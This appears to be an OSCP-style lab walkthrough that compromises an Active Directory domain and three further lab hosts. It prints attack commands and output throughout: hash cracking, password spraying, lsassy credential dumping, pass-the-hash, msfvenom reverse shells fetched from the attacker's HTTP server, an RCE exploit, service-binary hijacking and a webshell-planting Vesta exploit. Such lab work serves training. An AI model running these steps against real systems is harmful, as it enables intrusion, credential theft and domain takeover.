Information
About this lab
This lab guides learners through an Active Directory exploitation chain, beginning with credential discovery in a SQLite database on an exposed web server. By cracking the credentials, learners gain access to an internal system via WinRM, escalate privileges through binary analysis and pivoting, and extract the domain administrator hash to achieve full domain compromise.
Active Directory Set
192.168.135.153 - MS01
Eric.Wallows / EricLikesRunning800Nmap
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8000/tcp open http-alt

Information Gathering
Web scan with feroxbuster
Performed a directory scan via feroxbuster and found the following exposed endpoints:
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ feroxbuster -u http://192.168.135.153:8000 -s 200 -t 200
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.135.153:8000/
🚩 In-Scope Url │ 192.168.135.153
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 359l 2112w 178556c http://192.168.135.153:8000/iisstart.png
200 GET 32l 54w 696c http://192.168.135.153:8000/
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/db
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/DB
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/db
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/CHANGELOG
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/DB
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/CHANGELOG
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/changelog
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/changelog
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/Db

Downloaded DB file
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ wget http://192.168.135.153:8000/partner/db
--2025-12-26 01:52:36-- http://192.168.135.153:8000/partner/db
Connecting to 192.168.135.153:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octet-stream]
Saving to: ‘db’
db 100%[=====================================================>] 16.00K --.-KB/s in 0.08s
2025-12-26 01:52:36 (194 KB/s) - ‘db’ saved [16384/16384]

Found account credentials in the DB file
- ecorp,7007296521223107d3445ea0db5a04f9
- support,26231162520c611ccabfb18b5ae4dff2
- bcorp,e7966b31d1cad8a83f12ecec236c384c
- acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ cat db.json
id,name,password,desc
1,ecorp,7007296521223107d3445ea0db5a04f9,-
2,support,26231162520c611ccabfb18b5ae4dff2,support account for internal use
3,bcorp,e7966b31d1cad8a83f12ecec236c384c,-
4,acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e,-

Initial Access
Accessed the Windows system via SSH using the provided credentials
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh Eric.Wallows@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Eric.Wallows@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
oscp\eric.wallows@MS01 C:\Users\eric.wallows>

Enumerated local users
*Evil-WinRM* PS C:\> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.

Privilege Escalation
Discovered admintool.exe
oscp\eric.wallows@MS01 C:\Users\eric.wallows>dir
Volume in drive C has no label.
Volume Serial Number is 3C99-887F
Directory of C:\Users\eric.wallows
02/03/2025 01:14 PM <DIR> .
02/03/2025 01:14 PM <DIR> ..
11/21/2022 04:49 AM 6,102,702 admintool.exe
12/07/2019 01:14 AM <DIR> Desktop
12/25/2025 10:23 PM <DIR> Documents
12/07/2019 01:14 AM <DIR> Downloads
12/07/2019 01:14 AM <DIR> Favorites
12/07/2019 01:14 AM <DIR> Links
12/07/2019 01:14 AM <DIR> Music
12/07/2019 01:14 AM <DIR> Pictures
12/07/2019 01:14 AM <DIR> Saved Games
12/07/2019 01:14 AM <DIR> Videos
1 File(s) 6,102,702 bytes
11 Dir(s) 10,279,878,656 bytes free

Executed admintool.exe and found the administrator's hash. The binary's assertion compares the MD5 of the entered password (an empty input hashes to d41d8cd98f00b204e9800998ecf8427e, the "left" value) with the hard-coded expected hash, which the panic message prints as "right":
- 05f8ba9f047f799adbea95a16de2ef5d
oscp\eric.wallows@MS01 C:\Users\eric.wallows>admintool.exe whoami
Enter administrator password:
thread 'main' panicked at 'assertion failed: `(left == right)`
left: `"d41d8cd98f00b204e9800998ecf8427e"`,
right: `"05f8ba9f047f799adbea95a16de2ef5d"`: Wrong administrator password!', src/main.rs:78:5
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

Cracked the hashes
- https://hashes.com/en/decrypt/hash
- December31
- Freedom1
- ecorp
- Raid123!
- bcorp123!
05f8ba9f047f799adbea95a16de2ef5d:December31
26231162520c611ccabfb18b5ae4dff2:Freedom1
7007296521223107d3445ea0db5a04f9:ecorp
df5fb539ff32f7fde5f3c05d8c8c1a6e:Raid123!
e7966b31d1cad8a83f12ecec236c384c:bcorp123!
Successfully authenticated as administrator via SSH using previously cracked password
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh administrator@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
administrator@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
administrator@MS01 C:\Users\Administrator>

Post-Exploitation
Checked the PowerShell history and found a string that appeared to be a password
- hghgib6vHT3bVWf
PS C:\Users\Administrator\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
<SNIP>

Pivoting
Executed the Ligolo-ng proxy on Kali Linux for pivoting
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] daemon configuration file not found. Creating a new one...
? Enable Ligolo-ng WebUI? No
WARN[0001] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0001] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0001] Listening on 0.0.0.0:11601
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0058] Agent joined. id=005056ab5af9 name="MS01\\Administrator@MS01" remote="192.168.135.153:52168"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - MS01\Administrator@MS01 - 192.168.135.153:52168 - 005056ab5af9
[Agent : MS01\Administrator@MS01] » interface_create --name ligolo
INFO[0081] Creating a new ligolo interface...
INFO[0081] Interface created!
[Agent : MS01\Administrator@MS01] » start
INFO[0084] Starting tunnel to MS01\Administrator@MS01 (005056ab5af9)
[Agent : MS01\Administrator@MS01] » route_add --name ligolo --route 10.10.68.0/24
INFO[0101] Route created.

Executed the Ligolo-ng agent on MS01
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\agent.exe -connect 192.168.`111111`:11601 -ignore-cert
agent.exe : time="2025-12-25T23:38:58-08:00" level=warning msg="warning, certificate validation disabled"
+ CategoryInfo : NotSpecified: (time="2025-12-2...ation disabled":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
time="2025-12-25T23:38:59-08:00" level=info msg="Connection established" addr="192.168.45.199:11601"

10.10.68.154 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman

Lateral Movement (MS01 to MS02)
Performed a password spraying attack against the WinRM service using nxc and successfully authenticated as administrator with the following credentials:
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad]
└─$ nxc winrm 10.10.68.154 -u users.txt -p password.txt -t 100 --continue-on-success --local-auth
WINRM 10.10.68.154 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.68.154 5985 MS02 [-] MS02\administrator:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:EricLikesRunning800
<SNIP>
WINRM 10.10.68.154 5985 MS02 [-] MS02\bcorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [-] MS02\acorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:hghgib6vHT3bVWf
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:hghgib6vHT3bVWf

Accessed 10.10.68.154 via WinRM
┌──(kali🎃kali)-[~/oscp/ad]
└─$ evil-winrm -i 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Post-Exploitation
Dumped credentials using nxc's lsassy module and successfully extracted the administrator's NTLM hash
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad/154]
└─$ nxc smb 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf' --local-auth -M lsassy
SMB 10.10.68.154 445 MS02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS02) (domain:MS02) (signing:False) (SMBv1:False)
SMB 10.10.68.154 445 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
LSASSY 10.10.68.154 445 MS02 OSCP\Administrator 59b280ba707d22e3ef0aa587fc29ffe5

10.10.68.152 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman

Lateral Movement (MS02 to DC01)
Authenticated via WinRM using the administrator NTLM hash previously obtained from MS02
┌──(kali🎃kali)-[~]
└─$ nxc winrm 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
WINRM 10.10.68.152 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.68.152 5985 DC01 [+] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 (Pwn3d!)
WINRM 10.10.68.152 5985 DC01 [-] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 zip() argumen

Accessed via WinRM
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
1cfa2fd5d9f96abf7da31c2a724927a4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.68.152
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.68.254

Independent Challenge
192.168.135.155 - Pascha
Nmap
PORT STATE SERVICE
80/tcp open http
9099/tcp open unknown
9999/tcp open abyss

Initial Access
Searched “9099/tcp open unknown vuln” and identified the service as Mobile Mouse 3.6.0.4, which has an RCE vulnerability
Downloaded POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit -m 51010
Exploit: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51010
Path: /usr/share/exploitdb/exploits/windows/remote/51010.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/155/51010.py

Created a reverse shell executable
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9099 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: met.exe

Opened an HTTP server on port 8080 to host the malicious payload (met.exe)
┌──(kali🎃kali)-[~/oscp/155]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Set up an nc reverse shell listener on port 9099
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...

Executed POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ python 51010.py --target 192.168.135.155 --file met.exe --lhost 192.168.45.199
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\{'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\W'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\{'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\W'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
Executing The Command Shell...
Take The Rose

Successfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 53346
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>

Read local.txt
PS C:\Users\tim\Desktop> type local.txt
type local.txt
7bcaf20a94dc192a17c0ea06bdd45366
PS C:\Users\tim\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fdb5:ada4:541a:7a21
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254

Privilege Escalation
PowerUp
Executed PowerUp enumeration and discovered that the service executable (C:\Program Files\MilleGPG5\GPGService.exe) is modifiable by BUILTIN\Users
ServiceName : GPGOrchestrator
Path : "C:\Program Files\MilleGPG5\GPGService.exe"
ModifiableFile : C:\Program Files\MilleGPG5\GPGService.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'GPGOrchestrator'
CanRestart : True
Name : GPGOrchestrator
Check : Modifiable Service Files

Created a reverse shell payload to connect back on port 9999
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9999 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe

Stopped the GPGOrchestrator service and replaced GPGService.exe with payload.exe
PS C:\Users\Tim\Desktop> sc.exe stop GPGOrchestrator
sc.exe stop GPGOrchestrator
SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\Tim\Desktop> cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"
cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"

Started the GPGOrchestrator service
PS C:\Users\Tim\Desktop> sc.exe start GPGOrchestrator
sc.exe start GPGOrchestrator
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

Successfully established an nc connection on port 9999 (the 1053 timeout is expected: the payload never reports to the Service Control Manager, but it has already run as LocalSystem and connected back)
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 55262
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Read proof.txt
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2025 6:59 AM 34 proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
f467f9374a3d455ce6a49eb39ac0328a
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2349:460f:c907:a12c%4
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254

192.168.135.156 - Frankfurt
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2525/tcp open ms-v-worlds
3306/tcp open mysql
8080/tcp open http-proxy
8083/tcp open us-srv
8443/tcp open https-alt
53/udp open domain
161/udp open snmp

Initial Access & Privilege Escalation
Brute-forced the SNMP community string with hydra and found that the default “public” string is in use
┌──(kali🎃kali)-[~/oscp/156]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.135.156
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 10:54:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.135.156:161/
[161][snmp] host: 192.168.135.156 password: public
[STATUS] attack finished for 192.168.135.156 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 10:54:28

Performed snmpwalk and discovered recently reset credentials for user “jack”:
- jack:3PUKsX98BMupBiCf
┌──(kali🎃kali)-[~/oscp/156]
└─$ snmpwalk -v2c -c public 192.168.135.156 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password-cmd" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password-cmd" = STRING: "\"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password-cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password-cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password-cmd" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password-cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password-cmd" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password-cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password-cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password" = INTEGER: 256
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password-cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password".1 = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password-cmd".1 = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd

Accessed the web service on port 8083 and found the Vesta login page
Logged in with jack:3PUKsX98BMupBiCf
Found an RCE vulnerability in Vesta
Executed POC using the previously obtained jack credentials and obtained a root-privilege shell
┌──(kali🎃kali)-[~/oscp/156/vesta-rce-exploit]
└─$ python vesta-rce-exploit.py https://192.168.135.156:8083 jack 3PUKsX98BMupBiCf
[INFO] Attempting login to https://192.168.135.156:8083 as jack
[+] Logged in as jack
[INFO] Checking for existing webshell or creating one
[!] xzy0qvzq2m.poc not found, creating one...
[+] xzy0qvzq2m.poc added
[+] xzy0qvzq2m.poc found, looking up webshell
[!] webshell not found, creating one..
[+] Webshell uploaded
[INFO] Creating mailbox on domain xzy0qvzq2m.poc
[!] Mail domain not found, creating one..
[+] Mail domain created
[+] Mail account created
[INFO] Editing mailbox to test payload
[INFO] Deploying backdoor via mailbox editing
[INFO] [+] Root shell possibly obtained. Enter commands:
# id
uid=0(root) gid=0(root) groups=0(root)

Read local.txt
# cat /home/jack/local.txt
9cfca959e54738e70905a4024d16a44a
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94989 bytes 6111879 (6.1 MB)
RX errors 0 dropped 757 overruns 0 frame 0
TX packets 84189 bytes 7450035 (7.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8205 bytes 847767 (847.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8205 bytes 847767 (847.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Read proof.txt
# cat /root/proof.txt
07fd2596d9afbb88f7864b5dd02244ea
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94102 bytes 6021197 (6.0 MB)
RX errors 0 dropped 755 overruns 0 frame 0
TX packets 83675 bytes 6854793 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7483 bytes 765378 (765.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7483 bytes 765378 (765.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

192.168.135.157 - Charlie
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
20000/tcp open dnp

Initial Access
Anonymous FTP login successful
┌──(kali🎃kali)-[~/oscp/157]
└─$ ftp 192.168.135.157
Connected to 192.168.135.157.
220 (vsFTPd 3.0.5)
Name (192.168.135.157:kali): anonymous
331 Please specify the password.
Password:
230 Login successful

Found PDF files in the backup directory
ftp> ls
229 Entering Extended Passive Mode (|||10097|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 120 4096 Nov 02 2022 backup
226 Directory send OK.
ftp> cd backup
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10099|)
150 Here comes the directory listing.
-rw-r--r-- 1 114 120 145831 Nov 02 2022 BROCHURE-TEMPLATE.pdf
-rw-r--r-- 1 114 120 159765 Nov 02 2022 CALENDAR-TEMPLATE.pdf
-rw-r--r-- 1 114 120 336971 Nov 02 2022 FUNCTION-TEMPLATE.pdf
-rw-r--r-- 1 114 120 739052 Nov 02 2022 NEWSLETTER-TEMPLATE.pdf
-rw-r--r-- 1 114 120 888653 Nov 02 2022 REPORT-TEMPLATE.pdf

Downloaded the PDF files
ftp> mget *
mget BROCHURE-TEMPLATE.pdf [anpqy?]? a
Prompting off for duration of mget.
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for BROCHURE-TEMPLATE.pdf (145831 bytes).
100% |***************************************************************************| 142 KiB 319.42 KiB/s 00:00 ETA
226 Transfer complete.
145831 bytes received in 00:00 (241.87 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for CALENDAR-TEMPLATE.pdf (159765 bytes).
100% |***************************************************************************| 156 KiB 338.52 KiB/s 00:00 ETA
226 Transfer complete.
159765 bytes received in 00:00 (254.41 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for FUNCTION-TEMPLATE.pdf (336971 bytes).
100% |***************************************************************************| 329 KiB 396.25 KiB/s 00:00 ETA
226 Transfer complete.
336971 bytes received in 00:00 (341.38 KiB/s)
229 Entering Extended Passive Mode (|||10094|)
150 Opening BINARY mode data connection for NEWSLETTER-TEMPLATE.pdf (739052 bytes).
100% |***************************************************************************| 721 KiB 535.89 KiB/s 00:00 ETA
226 Transfer complete.
739052 bytes received in 00:01 (487.95 KiB/s)
229 Entering Extended Passive Mode (|||10098|)
150 Opening BINARY mode data connection for REPORT-TEMPLATE.pdf (888653 bytes).
100% |***************************************************************************| 867 KiB 722.38 KiB/s 00:00 ETA
226 Transfer complete.
888653 bytes received in 00:01 (648.10 KiB/s)

Checked the PDF files' author metadata
- Cassie
- Mark
- Robert
┌──(kali🎃kali)-[~/oscp/157]
└─$ exiftool *.pdf | grep Author
Author : Cassie
Author : Mark
Author : Robert

Performed an FTP brute-force attack and discovered valid credentials:
- cassie / cassie
┌──(kali🎃kali)-[~/oscp/157]
└─$ hydra -L users.txt -P users.txt ftp://192.168.135.157 -t 50
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 11:54:55
[DATA] max 36 tasks per 1 server, overall 36 tasks, 36 login tries (l:6/p:6), ~1 try per task
[DATA] attacking ftp://192.168.135.157:21/
[21][ftp] host: 192.168.135.157 login: cassie password: cassie
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 11:55:00

Accessed the web service on port 20000 and identified that Usermin is running
Successfully logged in with cassie:cassie
Found a Usermin authenticated RCE vulnerability
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit Usermin
